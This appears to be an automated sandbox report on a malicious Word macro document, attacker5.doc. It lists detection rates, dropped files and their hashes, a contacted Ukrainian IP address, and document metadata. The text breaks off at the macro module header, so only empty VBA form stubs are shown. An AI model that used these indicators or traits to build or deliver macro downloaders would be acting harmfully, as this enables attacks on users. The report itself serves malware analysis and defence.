    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    attacker5.doc49%VirustotalBrowse
    attacker5.doc40%MetadefenderBrowse
    attacker5.doc45%ReversingLabsDocument-Word.Downloader.Heuristic
    attacker5.doc100%AviraHEUR/Macro.Agent
    attacker5.doc100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP100%AviraHEUR/Macro.Downloader.YPA.Gen
    C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.%s.comPA0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.piriform.com/ccleanerpowershell.exe, 00000002.00000002.417841377.0000000000393000.00000004.00000020.sdmpfalse
      high
      http://www.%s.comPApowershell.exe, 00000002.00000002.418116880.0000000002360000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      low
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000002.00000002.418116880.0000000002360000.00000002.00020000.sdmpfalse
        high

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        176.103.56.89
        unknownUkraine
        48031XSERVER-IP-NETWORK-ASUAfalse

        General Information

        Joe Sandbox Version:34.0.0 Boulder Opal
        Analysis ID:522199
        Start date:15.11.2021
        Start time:19:26:59
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 4m 51s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:attacker5.doc
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.bank.troj.expl.evad.winDOC@5/15@0/1
        EGA Information:Failed
        HDC Information:Failed
        HCA Information:
        • Successful, ratio: 86%
        • Number of executed functions: 6
        • Number of non-executed functions: 2
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .doc
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
        • Execution Graph export aborted for target powershell.exe, PID 1292 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        19:28:18API Interceptor94x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        XSERVER-IP-NETWORK-ASUAtgduMePOh0.exeGet hashmaliciousBrowse
        • 91.213.8.130
        y2N49ht6t4.exeGet hashmaliciousBrowse
        • 91.207.60.48
        2f50000.exeGet hashmaliciousBrowse
        • 91.213.8.130
        C++ Dropper.exeGet hashmaliciousBrowse
        • 176.103.61.84
        rGnw6yNeQi.exeGet hashmaliciousBrowse
        • 176.103.61.84
        yHvyuzaSkP.exeGet hashmaliciousBrowse
        • 91.207.61.175
        V0YCf551dR.exeGet hashmaliciousBrowse
        • 91.213.8.130
        Scanned_from_a_Xerox_Multifunction_Printer.docGet hashmaliciousBrowse
        • 91.213.8.101
        Scanned_from_a_Xerox_Multifunction_Printer.docGet hashmaliciousBrowse
        • 91.213.8.101
        RFQ_21032018.docGet hashmaliciousBrowse
        • 91.213.8.30

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):23040
        Entropy (8bit):4.912483360778795
        Encrypted:false
        SSDEEP:384:NtH/63RV2pg0jm4SrooEpqYOhaRZmqoWBC0h6NsIPCht5p:63nvv4SrooEEYOQRZdoWBC0hGsIPYt5p
        MD5:DCA730E5601626A16C51196137FC916A
        SHA1:0789C0C1497DAE228DBFE37A9CB912DC1826E541
        SHA-256:8CCA2398435027C4EF370864C84074C518FEBE88A63EE12B257196A33FCF6267
        SHA-512:6FB3A6072740646D392A4A730558C126B515CFF15A63B4D0B6DA8439FF9CE4E0B13EEAD3814292F78DCA5BA19BB76164AD5CF1FAD09A5E6FA0A4E2D84DD70E43
        Malicious:false
        Reputation:low
        Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................)...*...............................................................+...................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48A7C03B-9CB7-46B2-8DC4-5DC849FD423A}.tmp
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Reputation:high, very likely benign file
        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):147284
        Entropy (8bit):4.421645694351142
        Encrypted:false
        SSDEEP:1536:C8CL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CBJNSc83tKBAvQVCgOtmXmLpLmB
        MD5:A0D41E336E4FDD1C31A9124DCBCC3FCB
        SHA1:13D2B12155B9A670A51CE481DF8F01311B3C1C46
        SHA-256:B5E1B8E19C988B7CFE5DFD19DA705870288F507CA7AA21601C7C81D7CC0F54F3
        SHA-512:6313726A66F844F516FA7EB952FB31E9CBE878D678B441CC7F17ABBF3B03EEFD4AEAFF52D80DA86CA63BF60DF3F485D278F5B782AF447EF362552869B98B767C
        Malicious:false
        Reputation:low
        Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8...........N..............\W...............J..............,<...............<..............xW..............xY..xG.............T...........D...............................T...............................................................&!..d...........................................................................................
        C:\Users\user\AppData\Local\Temp\~DF392CA3D6DBFBE1F2.TMP
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Temp\~DF57A40270983B8D7F.TMP
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):47104
        Entropy (8bit):4.538578220627429
        Encrypted:false
        SSDEEP:768:pTU91y2uPcuPrL1rEYO2JoT6RCE+6ZRZdoWBC0hGsIPYtfp:pTUynhr/JoT6RCEEWWj0f
        MD5:5EE24DA34FCA949C8E3242B150761755
        SHA1:C99AF28F251407D04CDEC491D36A91410E60C91E
        SHA-256:99113D7E01915005DB4B5C016B6C725CE5E0B491A8363A92B06FA67D4C812D13
        SHA-512:70E0B534324374C42CA668179D7ABD441A3B981CA3DC611E66FBEC4ED3FBE5F72A96C2582EBC193635D7AA41BE353BB0A7C44422004EEE7F9453F19BD836927F
        Malicious:true
        Yara Hits:
        • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP, Author: Florian Roth
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        • Antivirus: Joe Sandbox ML, Detection: 100%
        Reputation:low
        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................&...................!............................................................................................... ..."...:...#...$...%...'.......(...)...*...5...,...-......./...0...1...2...3...4.......6...7...8...9...;...?...>...=.......W...X...A...J...C...D...E...F...G...H...I...<...K...L...M...N...O...P...Q...R...S...T...U...V.......Y.......Z...................................................................................................................................
        C:\Users\user\AppData\Local\Temp\~DF93C02D3A080000CF.TMP
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):11264
        Entropy (8bit):4.511412228552242
        Encrypted:false
        SSDEEP:192:/y7pqfCYaORf9eT7NVdccYJqvgWr40C0l76WkdsIPxoht0p:cpqYOhaRZmqoWBC0h6NsIPCht0p
        MD5:6B3E9828C22633A3CBD0E5B776C0EA2D
        SHA1:4A8491468FA72132E0289E1DA0A7E84CBA63A4C5
        SHA-256:843017F22D1F53D8282545DE7478D52F3FD13A834B236D45733C6ADA77DD2AFE
        SHA-512:931722DD3F9DD35F549574EAEFBF652BF553A6F063082DE604F83F4A858FB6A081CF82E9F1A17C8275A152A743583B1440526366E73B7FC29D6BC074DD0A0B8C
        Malicious:false
        Reputation:low
        Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\attacker5.LNK
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:54 2021, mtime=Mon Aug 30 20:08:54 2021, atime=Tue Nov 16 02:28:12 2021, length=43008, window=hide
        Category:dropped
        Size (bytes):1009
        Entropy (8bit):4.51023198489696
        Encrypted:false
        SSDEEP:24:8Zw/XTKz3cYm7oireTYLhyDv3qTaQd7Qy:8a/XTKbBm8irIYFBOUj
        MD5:0F0BCF3C449DE213830328259C67D412
        SHA1:0E4E4A0AA02EAE2CC5573FD8685794726500D590
        SHA-256:50A8050D598001FB4FE645088BEF9C3F041F96D1BBBD96F52A8AF0B0F070976A
        SHA-512:DCB90A1F7107CE802E2EC78443A59B1CCEF89FBFC5B57BF6B3CF04F73B593AC1911841E6A4D7A7709288E3BF79FB9AC1D481005681C95441B8FDF9C600D92503
        Malicious:false
        Reputation:low
        Preview: L..................F.... .....==.....==...@....................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S....Desktop.d......QK.X.S..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.....pS.. .ATTACK~1.DOC..H.......S...S..*.........................a.t.t.a.c.k.e.r.5...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\attacker5.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.a.t.t.a.c.k.e.r.5...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......116938..........D_....3N...W...9..g............[D_....3N...W...9..g........
        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):69
        Entropy (8bit):4.484070798959447
        Encrypted:false
        SSDEEP:3:bDuMJlcRiZFXCmX1cOFXCv:bCBiZBmOBs
        MD5:92458470D1EFB1A1045D2733BF4E1F5C
        SHA1:F413219181EA4E8432642F944A6F8699B3C052C7
        SHA-256:5C17666DA34EA8C5B5E5E73192B3C71E9A944B216A2C5F423996046847748007
        SHA-512:0A79B4D3EA7A1744522AC08A6320EF8B0421EB77B7330E6F9A8A6E20B5482BBC3F725A11FCACB1322259ACABE7C099E4C5B2C95FEAB50E569CE423D1567C748F
        Malicious:false
        Preview: [folders]..Templates.LNK=0..attacker5.LNK=0..[doc]..attacker5.LNK=0..
        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.5038355507075254
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
        MD5:45B1E2B14BE6C1EFC217DCE28709F72D
        SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
        SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
        SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
        Malicious:false
        Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3EUAMEHPTLTEJH1AS88K.temp
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):8016
        Entropy (8bit):3.5818823994431517
        Encrypted:false
        SSDEEP:96:chQCsMqLqvsqvJCwooz8hQCsMqLqvsEHyqvJCworuzxoKr+HDpxpyD0lUVqA2:cy+ooz8yWHnoruzxx2f8DqA2
        MD5:52ED5BCA62D6E8B44FF8C19254D238A7
        SHA1:E74EA58976A264F54266C5DB6A5552374AACAC06
        SHA-256:935731D3E60C8296A3F4504917CA4DE6D2C4E93A54520801F734541A23E3DF6F
        SHA-512:B494B478862C3064F4B542F550DB08A0E615ABF85EFFF04AFBD00611EB7AE90C78E2B06FB9A0EE8269FAA8B62D25DEED9084B62C93E29522DA59D3485A09950B
        Malicious:false
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):8016
        Entropy (8bit):3.5799033057552143
        Encrypted:false
        SSDEEP:96:chQCsMqLqvsqvJCwooz8hQCsMqLqvsEHyqvJCworuzeoY0HDF2D0lUVqA2:cy+ooz8yWHnoruzecF2DqA2
        MD5:71F8B05527247274055E9981AEFC96D8
        SHA1:72E2976B32B3F9A71C6599D190B13F067C8D73D5
        SHA-256:026B25B0198E2D09FF7AEA61797959F7B539090B69F5C19571FC494C953438A6
        SHA-512:52BD6CF5417668886F5D218FD5B0E8F65F53520453B4E33FCAF80D42F1C850A9466295ADE06372B2CAA77E06CF9DA98C25AE41D713D52D9445778C8367CD9B88
        Malicious:false
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H8RTSPYLHIEB5H6HBIZB.temp
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):8016
        Entropy (8bit):3.5799033057552143
        Encrypted:false
        SSDEEP:96:chQCsMqLqvsqvJCwooz8hQCsMqLqvsEHyqvJCworuzeoY0HDF2D0lUVqA2:cy+ooz8yWHnoruzecF2DqA2
        MD5:71F8B05527247274055E9981AEFC96D8
        SHA1:72E2976B32B3F9A71C6599D190B13F067C8D73D5
        SHA-256:026B25B0198E2D09FF7AEA61797959F7B539090B69F5C19571FC494C953438A6
        SHA-512:52BD6CF5417668886F5D218FD5B0E8F65F53520453B4E33FCAF80D42F1C850A9466295ADE06372B2CAA77E06CF9DA98C25AE41D713D52D9445778C8367CD9B88
        Malicious:false
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):8016
        Entropy (8bit):3.5818823994431517
        Encrypted:false
        SSDEEP:96:chQCsMqLqvsqvJCwooz8hQCsMqLqvsEHyqvJCworuzxoKr+HDpxpyD0lUVqA2:cy+ooz8yWHnoruzxx2f8DqA2
        MD5:52ED5BCA62D6E8B44FF8C19254D238A7
        SHA1:E74EA58976A264F54266C5DB6A5552374AACAC06
        SHA-256:935731D3E60C8296A3F4504917CA4DE6D2C4E93A54520801F734541A23E3DF6F
        SHA-512:B494B478862C3064F4B542F550DB08A0E615ABF85EFFF04AFBD00611EB7AE90C78E2B06FB9A0EE8269FAA8B62D25DEED9084B62C93E29522DA59D3485A09950B
        Malicious:false
        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
        C:\Users\user\Desktop\~$tacker5.doc
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.5038355507075254
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
        MD5:45B1E2B14BE6C1EFC217DCE28709F72D
        SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
        SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
        SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
        Malicious:false
        Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

        Static File Info

        General

        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: sales, Template: Normal, Last Saved By: salesdepartmentx@outlook.com, Revision Number: 5, Name of Creating Application: Microsoft Office Word, Total Editing Time: 06:00, Create Time/Date: Tue Nov 2 00:53:00 2021, Last Saved Time/Date: Tue Nov 2 02:01:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
        Entropy (8bit):4.148559492041284
        TrID:
        • Microsoft Word document (32009/1) 54.23%
        • Microsoft Word document (old ver.) (19008/1) 32.20%
        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
        File name:attacker5.doc
        File size:41472
        MD5:4ac3d0835c1650e2ec73c8607d55ed1d
        SHA1:ad6ebde97a0f082cfc812f5f99ecb83b0c4caf4b
        SHA256:55c9ff8f829bf0d5bbec83127570ad149bd18bc0351c59933090af917b4451db
        SHA512:c9805bdfdd5494e51529fbd4123e4b8be2acb8323185e07dd36e3a8b570c5eb8242077ed28f4ee122ccd01b3836202a3ec5da5ba70b90b22f24329b183919714
        SSDEEP:768:GMxw+tOOA8v4SV4mjEYOQRZdoWBC0hGsIPYtD:bxrt2SV42MWWj0D
        File Content Preview:........................>.......................'...........)...............&..................................................................................................................................................................................

        File Icon

        Icon Hash:e4eea2aaa4b4b4a4

        Static OLE Info

        General

        Document Type:OLE
        Number of OLE Files:1

        OLE File "attacker5.doc"

        Indicators

        Has Summary Info:True
        Application Name:Microsoft Office Word
        Encrypted Document:False
        Contains Word Document Stream:True
        Contains Workbook/Book Stream:False
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:
        Flash Objects Count:
        Contains VBA Macros:True

        Summary

        Code Page:1252
        Title:
        Subject:
        Author:sales
        Keywords:
        Template:Normal
        Last Saved By:salesdepartmentx@outlook.com
        Revion Number:5
        Total Edit Time:360
        Create Time:2021-11-02 00:53:00
        Last Saved Time:2021-11-02 02:01:00
        Number of Pages:1
        Number of Words:0
        Number of Characters:0
        Creating Application:Microsoft Office Word
        Security:0

        Document Summary

        Document Code Page:1252
        Number of Lines:0
        Number of Paragraphs:0
        Thumbnail Scaling Desired:False
        Company:
        Contains Dirty Links:False
        Shared Document:False
        Changed Hyperlinks:False
        Application Version:1048576

        Streams with VBA

        VBA File Name: CatchMeIfYouCan.frm, Stream Size: 1473
        General
        Stream Path:Macros/VBA/CatchMeIfYouCan
        VBA File Name:CatchMeIfYouCan.frm
        Stream Size:1473
        Data ASCII:. . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . e y _ q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Data Raw:01 16 01 00 01 f0 00 00 00 d0 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff d7 03 00 00 9f 04 00 00 00 00 00 00 01 00 00 00 65 79 5f 71 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        VBA Code
        Attribute VB_Name = "CatchMeIfYouCan"
        Attribute VB_Base = "0{1EFEF94B-5D68-499E-896C-2EF23F0DFA0F}{91AFCBA1-38EA-4EEC-AA4D-8812B8EABB58}"
        Attribute VB_GlobalNameSpace = False
        Attribute VB_Creatable = False
        Attribute VB_PredeclaredId = True
        Attribute VB_Exposed = False
        Attribute VB_TemplateDerived = False
        Attribute VB_Customizable = False
        Private Sub SquidGame_Click()
        
        End Sub
        
        Private Sub CatchMeIfYouCan_Click()
        
        End Sub
        VBA File Name: Module1.bas, Stream Size: 994
        General
        Stream Path:Macros/VBA/Module1
        VBA File Name:Module1.bas
